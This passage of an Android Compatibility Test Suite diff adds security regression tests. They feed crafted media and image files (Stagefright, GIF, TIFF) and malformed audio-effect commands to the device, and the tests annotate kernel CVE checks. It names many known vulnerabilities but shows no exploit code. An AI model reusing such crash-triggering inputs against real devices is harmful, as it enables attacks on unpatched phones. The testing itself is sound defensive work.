+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 22ff539..c481549 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2015 The Android Open Source Project
+ * Copyright (C) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -33,17 +33,22 @@
import android.media.MediaCodecList;
import android.media.MediaExtractor;
import android.media.MediaFormat;
+import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
import android.opengl.GLES20;
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
+import android.webkit.cts.CtsTestServer;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
+import java.util.HashMap;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -62,137 +67,234 @@
public StagefrightTest() {
}
+ /***********************************************************
+ to prevent merge conflicts, add K tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ public void testStagefright_bug_35763994() throws Exception {
+ doStagefrightTest(R.raw.bug_35763994);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_33137046() throws Exception {
+ doStagefrightTest(R.raw.bug_33137046);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
+ @SecurityTest
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- public void testStagefright_bug_32873375() throws Exception {
- doStagefrightTest(R.raw.bug_32873375);
- }
-
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- public void testStagefright_bug_14388161() throws Exception {
+ @SecurityTest
+ public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_3755() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3755);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
+ doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
+ }
+
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
- public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
- doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ /***********************************************************
+ to prevent merge conflicts, add N tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_35467107() throws Exception {
+ doStagefrightTest(R.raw.bug_35467107);
}
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
+ doStagefrightTestMediaMetadataRetriever(rid);
+
+ Context context = getInstrumentation().getContext();
+ Resources resources = context.getResources();
+ CtsTestServer server = new CtsTestServer(context);
+ String rname = resources.getResourceEntryName(rid);
+ String url = server.getAssetUrl("raw/" + rname);
+ doStagefrightTestMediaPlayer(url);
+ doStagefrightTestMediaCodec(url);
+ doStagefrightTestMediaMetadataRetriever(url);
+ server.shutdown();
}
private Surface getDummySurface() {
@@ -292,13 +394,32 @@
}
private void doStagefrightTestMediaPlayer(final int rid) throws Exception {
+ doStagefrightTestMediaPlayer(rid, null);
+ }
- String name = getInstrumentation().getContext().getResources().getResourceEntryName(rid);
+ private void doStagefrightTestMediaPlayer(final String url) throws Exception {
+ doStagefrightTestMediaPlayer(-1, url);
+ }
+
+ private void closeQuietly(AutoCloseable closeable) {
+ if (closeable != null) {
+ try {
+ closeable.close();
+ } catch (RuntimeException rethrown) {
+ throw rethrown;
+ } catch (Exception ignored) {
+ }
+ }
+ }
+
+ private void doStagefrightTestMediaPlayer(final int rid, final String uri) throws Exception {
+
+ String name = uri != null ? uri :
+ getInstrumentation().getContext().getResources().getResourceEntryName(rid);
Log.i(TAG, "start mediaplayer test for: " + name);
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
@@ -309,16 +430,23 @@
mp.setOnCompletionListener(mpcl);
Surface surface = getDummySurface();
mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
try {
- AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
- .openRawResourceFd(rid);
+ if (uri == null) {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(rid);
- mp.setDataSource(fd.getFileDescriptor(),
- fd.getStartOffset(),
- fd.getLength());
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } else {
+ mp.setDataSource(uri);
+ }
mp.prepareAsync();
} catch (Exception e) {
+ } finally {
+ closeQuietly(fd);
}
Looper.loop();
@@ -335,6 +463,14 @@
}
private void doStagefrightTestMediaCodec(final int rid) throws Exception {
+ doStagefrightTestMediaCodec(rid, null);
+ }
+
+ private void doStagefrightTestMediaCodec(final String url) throws Exception {
+ doStagefrightTestMediaCodec(-1, url);
+ }
+
+ private void doStagefrightTestMediaCodec(final int rid, final String url) throws Exception {
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
@@ -353,6 +489,7 @@
mp.setDataSource(fd.getFileDescriptor(),
fd.getStartOffset(),
fd.getLength());
+ fd.close();
} catch (Exception e) {
// this is a known-good file, so no failure should occur
fail("setDataSource of known-good file failed");
@@ -372,16 +509,21 @@
}
Resources resources = getInstrumentation().getContext().getResources();
- AssetFileDescriptor fd = resources.openRawResourceFd(rid);
MediaExtractor ex = new MediaExtractor();
- try {
- ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
- } catch (IOException e) {
- // ignore
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ ex.setDataSource(url);
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
- String rname = resources.getResourceEntryName(rid);
+ String rname = url != null ? url: resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
for (int t = 0; t < numtracks; t++) {
// find all the available decoders for this format
@@ -394,13 +536,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
@@ -421,16 +565,22 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
+ ex.getCachedDuration();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -451,14 +601,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
@@ -469,6 +613,81 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
+ }
+ private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(rid, null);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(final String url) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(-1, url);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(
+ final int rid, final String url) throws Exception {
+
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ AssetFileDescriptor fd = null;
+ try {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+
+ // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
+ // setDataSource has been called
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ // this is a known-good file, so no failure should occur
+ fail("setDataSource of known-good file failed");
+ }
+
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ // wait until the thread has initialized the MediaPlayer
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaMetadataRetriever retriever = new MediaMetadataRetriever();
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ retriever.setDataSource(url, new HashMap<String, String>());
+ }
+ retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
+ retriever.getEmbeddedPicture();
+ retriever.getFrameAtTime();
+
+ retriever.release();
+ String rname = url != null ? url : resources.getResourceEntryName(rid);
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
}
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
new file mode 100644
index 0000000..807412b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import junit.framework.TestCase;
+
+import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
+import android.media.audiofx.AudioEffect;
+import android.media.MediaPlayer;
+import android.media.audiofx.Visualizer;
+import android.test.AndroidTestCase;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Method;
+import java.util.UUID;
+
+public class VisualizerEffectTest extends InstrumentationTestCase {
+ private String TAG = "VisualizerEffectTest";
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ //Testing security bug: 30229821
+ @SecurityTest
+ public void testVisualizer_MalformedConstructor() throws Exception {
+ final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ final int VISUALIZER_CMD_MEASURE = 0x10001;
+
+ AudioEffect.Descriptor[] descriptors = AudioEffect.queryEffects();
+ int i, visualizerIndex = -1;
+ for (i = 0; i < descriptors.length; ++i) {
+ AudioEffect.Descriptor descriptor = descriptors[i];
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) == 0) {
+ visualizerIndex = i;
+
+ AudioEffect ae = null;
+ MediaPlayer mp = null;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), R.raw.good);
+ Constructor ct = AudioEffect.class.getConstructor(UUID.class, UUID.class,
+ int.class, int.class);
+ ae = (AudioEffect) ct.newInstance(descriptors[visualizerIndex].type,
+ descriptors[visualizerIndex].uuid, 0, mp.getAudioSessionId());
+ Method command = AudioEffect.class.getDeclaredMethod("command", int.class,
+ byte[].class, byte[].class);
+ Integer ret = (Integer) command.invoke(ae, new Object[]{VISUALIZER_CMD_MEASURE,
+ new byte[0], new byte[0]});
+ assertTrue("Audio server might have crashed", ret != -7);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing visualizer");
+ } finally {
+ if (ae != null) {
+ ae.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ }
+ }
+
+ if (visualizerIndex == -1) {
+ Log.w(TAG,"No visualizer found to test");
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
new file mode 100644
index 0000000..bbc70a9
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class ZeroHeightTiffTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a zero height tiff file.
+ *
+ * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
+ * With the fix, decoding will fail, without dividing by zero.
+ */
+ @SecurityTest
+ public void test_android_bug_33300701() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
diff --git a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
old mode 100755
new mode 100644
index b896229..3e071b6
--- a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
+++ b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
@@ -25,10 +25,7 @@
import android.content.pm.ServiceInfo;
import android.content.res.Resources;
import android.os.Parcel;
-import android.os.ParcelFileDescriptor;
-import android.support.test.InstrumentationRegistry;
import android.test.AndroidTestCase;
-import android.text.TextUtils;
import android.util.Printer;
import android.view.inputmethod.InputMethod;
import android.view.inputmethod.InputMethodInfo;
@@ -37,10 +34,7 @@
import org.xmlpull.v1.XmlPullParserException;
-import java.io.BufferedReader;
import java.io.IOException;
-import java.io.InputStreamReader;
-import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
@@ -249,11 +243,6 @@
return;
}
- if (!TextUtils.equals("native", getFbeMode())) {
- // Skip the test unless the device is in native FBE mode.
- return;
- }
-
final InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
final List<InputMethodInfo> imis = imm.getInputMethodList();
boolean hasEncryptionAwareInputMethod = false;
@@ -279,22 +268,4 @@
public void println(String x) {
}
}
-
- private String getFbeMode() {
- try (ParcelFileDescriptor.AutoCloseInputStream in =
- new ParcelFileDescriptor.AutoCloseInputStream(
- InstrumentationRegistry
- .getInstrumentation()
- .getUiAutomation()
- .executeShellCommand("sm get-fbe-mode"))) {
- try (BufferedReader br =
- new BufferedReader(new InputStreamReader(in, StandardCharsets.UTF_8))) {
- // Assume that the output of "sm get-fbe-mode" is always one-line.
- final String line = br.readLine();
- return line != null ? line.trim() : "";
- }
- } catch (IOException e) {
- return "";
- }
- }
}
diff --git a/tools/cts-tradefed/Android.mk b/tools/cts-tradefed/Android.mk
index d0be4ee..304d8d6 100644
--- a/tools/cts-tradefed/Android.mk
+++ b/tools/cts-tradefed/Android.mk
@@ -25,7 +25,7 @@
LOCAL_SUITE_TARGET_ARCH := $(TARGET_ARCH)
LOCAL_SUITE_NAME := CTS
LOCAL_SUITE_FULLNAME := "Compatibility Test Suite"
-LOCAL_SUITE_VERSION := 7.0_r7
+LOCAL_SUITE_VERSION := 7.0_r201704s
LOCAL_MODULE := cts-tradefed
diff --git a/tools/cts-tradefed/res/config/cts-dev.xml b/tools/cts-tradefed/res/config/cts-dev.xml
new file mode 100644
index 0000000..0cf53ca
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-dev.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs CTS with common options set developer workflow: skips most checks">
+
+ <include name="cts" />
+
+ <option name="log-level" value="verbose" />
+ <option name="skip-preconditions" value="true" />
+ <option name="skip-device-info" value="true" />
+
+ <option name="compatibility:plan" value="cts-dev" />
+ <option name="compatibility:skip-all-system-status-check" value="true" />
+ <option name="compatibility:primary-abi-only" value="true" />
+
+</configuration>
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
index 6385139..2463f87 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
@@ -48,7 +48,7 @@
@Option(name="branch", description="build branch name to supply.")
private String mBranch = null;
- public static final String CTS_BUILD_VERSION = "7.0_r3";
+ public static final String CTS_BUILD_VERSION = "7.0_r201701s";
public static final String CTS_PACKAGE = "com.android.cts.tradefed.testtype";
/**
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
index 6ab175f..9233a4a 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
@@ -43,7 +43,6 @@
// Delete earlier report logs if present on device.
String command = String.format("adb -s %s shell rm -rf %s", device.getSerialNumber(),
SRC_DIR);
- CLog.e(command);
if (device.doesFileExist(SRC_DIR)) {
Process process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
command});
